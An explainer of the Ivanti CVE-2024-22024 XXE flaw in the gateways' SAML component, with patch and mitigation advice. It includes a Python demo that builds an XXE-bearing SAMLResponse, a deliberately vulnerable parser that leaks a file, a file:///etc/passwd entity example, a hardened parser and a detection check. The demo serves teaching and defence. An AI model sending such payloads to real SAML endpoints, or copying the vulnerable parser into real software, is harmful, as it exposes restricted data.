XXE Vulnerability in Ivanti’s Products: What You Need to Know and Do

Question:

How can Ivanti’s Connect Secure, Policy Secure, and ZTA gateways be protected from the XXE vulnerability in their SAML component?

Answer:

Ivanti, a leading provider of enterprise VPN and network access solutions, disclosed on February 8, 2024 a high-severity vulnerability affecting its Connect Secure, Policy Secure, and ZTA gateways. The vulnerability, tracked as CVE-2024-22024 (CVSS 8.3), is an XML external entity (XXE) injection flaw in the products’ SAML component that lets an attacker reach certain restricted resources on unpatched appliances without authentication.

What is XXE and how does it affect Ivanti’s products?

XXE is a web security vulnerability that allows an attacker to interfere with an application’s processing of XML data. XML is a widely used format for exchanging data between web applications and servers. An XML document consists of elements and attributes, and its optional document type definition (DTD) can declare entities: named values that can be referenced later in the document. For example, `<!ENTITY name "John">` declares an entity, and every occurrence of `&name;` in the document is then replaced by `John`.

An entity can also be declared with a SYSTEM identifier, so that its value is loaded from a source outside the document, such as a file or a URL. These are external entities. For example, `<!ENTITY file SYSTEM "file:///etc/passwd">` declares an entity that, wherever `&file;` is referenced, is replaced by the contents of `/etc/passwd` on the machine doing the parsing.

This feature of XML can be exploited by an attacker who can control or influence the XML data that an application parses. By supplying XML whose DTD declares external entities pointing to sensitive files or URLs, the attacker can make the application disclose confidential data or send requests to other systems on the application’s behalf. This is known as XXE injection, and it can lead to local file disclosure, server-side request forgery (SSRF) against internal services, denial of service and, with some parser configurations, remote code execution. The root cause is always the same: a parser that resolves external entities in input received from an untrusted party. The standard fix is to disable DTD processing or external entity resolution in the parser altogether.

Ivanti’s Connect Secure, Policy Secure, and ZTA gateways are affected by an XXE vulnerability in their SAML component. SAML (Security Assertion Markup Language) is an XML-based standard for exchanging authentication and authorization assertions between an identity provider and a service provider. Ivanti’s products use SAML to provide single sign-on (SSO) for users accessing web applications through the gateways, which means the gateways must accept and parse XML arriving from the network.

The vulnerability allows an attacker to craft a SAML message whose DTD declares an external entity pointing at a restricted resource on the gateway and submit it to the SAML endpoint. Because that endpoint must be reachable before any login completes, no credentials are needed: the gateway parses the attacker-supplied XML, resolves the external entity, and the referenced content can be exposed to the attacker. Ivanti describes the impact as access to certain restricted resources without authentication.
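The following is an added example (not Ivanti’s code, and not a description of how the Ivanti SAML component is implemented) showing the mechanism described above end to end: a SAML Response carrying an XXE payload as it would travel in a POST-binding `SAMLResponse` parameter, a parser configured to resolve external entities, which leaks the referenced file into the NameID, and a hardened parser that rejects the same message. The file path, its token value, the NameID `alice@example.com` and the parser configurations are all assumptions constructed for the demonstration.

```python
"""Added example (not Ivanti's code): an XXE payload in the shape of a SAML
Response, a parser that resolves it, and a hardened parser that refuses it.
The file path, token value and NameID are constructed for the demo."""
import base64
import os
import tempfile
import urllib.request
import xml.parsers.expat as expat

SAML_NS = ('xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
           'xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"')


def make_restricted_file() -> str:
    """Constructed stand-in for a file the appliance should never reveal."""
    path = os.path.join(tempfile.mkdtemp(), "restricted.conf")
    with open(path, "w", encoding="ascii") as fh:
        fh.write("admin_token=EXAMPLE-NOT-A-REAL-TOKEN")
    return path


def build_saml_xxe(target_path: str) -> str:
    """Base64 SAMLResponse an attacker would POST to the SAML endpoint.
    The DOCTYPE declares an external entity whose SYSTEM id is a file URL
    chosen by the attacker; it is referenced where the NameID text belongs,
    so the parser's own entity resolution copies the file into the message."""
    doc = f"""<?xml version="1.0"?>
<!DOCTYPE samlp:Response [
  <!ENTITY secret SYSTEM "file://{target_path}">
]>
<samlp:Response {SAML_NS}>
  <saml:Assertion><saml:Subject>
    <saml:NameID>&secret;</saml:NameID>
  </saml:Subject></saml:Assertion>
</samlp:Response>"""
    return base64.b64encode(doc.encode()).decode()


def build_saml_clean() -> str:
    """A well-formed response with no DTD, as a real identity provider sends."""
    doc = f"""<?xml version="1.0"?>
<samlp:Response {SAML_NS}>
  <saml:Assertion><saml:Subject>
    <saml:NameID>alice@example.com</saml:NameID>
  </saml:Subject></saml:Assertion>
</samlp:Response>"""
    return base64.b64encode(doc.encode()).decode()


def _nameid_collector():
    """Expat parser plus a list that receives the text inside <saml:NameID>."""
    parser = expat.ParserCreate()
    text, inside = [], [False]

    def start(name, attrs):
        if name.endswith("NameID"):
            inside[0] = True

    def end(name):
        if name.endswith("NameID"):
            inside[0] = False

    def chars(data):
        if inside[0]:
            text.append(data)

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    return parser, text


def vulnerable_nameid(saml_response_b64: str) -> str:
    """VULNERABLE: an external-entity handler that fetches whatever SYSTEM id
    the document names. File contents (or an internal URL) end up in NameID."""
    parser, text = _nameid_collector()

    def fetch_external(context, base, system_id, public_id):
        with urllib.request.urlopen(system_id) as fh:  # attacker-chosen URL
            body = fh.read()
        # The child parser shares the handlers, so the fetched bytes flow into
        # the same CharacterDataHandler as ordinary NameID text.
        parser.ExternalEntityParserCreate(context).Parse(body, True)
        return 1

    parser.ExternalEntityRefHandler = fetch_external
    parser.Parse(base64.b64decode(saml_response_b64), True)
    return "".join(text)


def hardened_nameid(saml_response_b64: str) -> str:
    """HARDENED: no external-entity handler at all, and any DOCTYPE aborts the
    parse before an entity can even be declared. SAML never needs a DTD."""
    parser, text = _nameid_collector()

    def reject_dtd(doctype_name, system_id, public_id, has_internal_subset):
        raise ValueError("DTD in SAML message rejected: " + doctype_name)

    parser.StartDoctypeDeclHandler = reject_dtd
    parser.Parse(base64.b64decode(saml_response_b64), True)
    return "".join(text)


def looks_like_xxe(saml_response_b64: str) -> bool:
    """Cheap pre-parse check for a WAF rule or log triage: a DOCTYPE or ENTITY
    marker inside a POST-binding SAMLResponse is hostile."""
    raw = base64.b64decode(saml_response_b64).lower()
    return b"<!doctype" in raw or b"<!entity" in raw


if __name__ == "__main__":
    payload = build_saml_xxe(make_restricted_file())
    print("vulnerable parser leaked:", vulnerable_nameid(payload))
    print("payload flagged:", looks_like_xxe(payload))
    try:
        hardened_nameid(payload)
    except ValueError as exc:
        print("hardened parser:", exc)
    print("clean response NameID:", hardened_nameid(build_saml_clean()))
```

Two points worth noting. The hardened parser rejects the DOCTYPE rather than merely leaving the entity handler unset, because expat silently substitutes an empty string for an unresolved external entity, so a DTD-free policy is both safer and easier to audit. The `looks_like_xxe` check applies to the POST binding, where `SAMLResponse` is plain base64; the redirect binding DEFLATE-compresses the message before encoding, so a log or WAF rule there must inflate first.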

How can Ivanti’s customers protect themselves from the XXE vulnerability?

Ivanti has released patches for the XXE vulnerability. The affected releases are Ivanti Connect Secure 9.1R14.4, 9.1R17.2, 9.1R18.3, 22.4R2.2 and 22.5R1.1, Ivanti Policy Secure 22.5R1.1 and ZTA 22.6R1.3; customers running any of these should upgrade to the fixed versions named in Ivanti’s advisory as soon as possible. The patches are available on Ivanti’s standard download portal.

Customers running other supported versions of Ivanti’s products should apply the mitigation Ivanti published on January 31, 2024. The mitigation blocks the vulnerable endpoint on the gateways, so an XXE request never reaches the SAML parser. It is also available on Ivanti’s standard download portal.

Customers who have applied the patch or the mitigation need no further action for this vulnerability. Ivanti nevertheless recommends running its External Integrity Checker Tool to verify the integrity of the gateways and reviewing security logs for suspicious activity. In practice that means looking for SAML messages that carry a DOCTYPE or ENTITY declaration, which legitimate SAML traffic never contains.

Conclusion

The XXE vulnerability in Ivanti’s Connect Secure, Policy Secure, and ZTA gateways is a serious issue because it is reachable without authentication and can expose restricted data on the appliance. Ivanti has provided patches and a mitigation; customers should apply whichever applies to their version, verify the appliance with the integrity checker, and review logs for SAML requests containing DTD declarations.
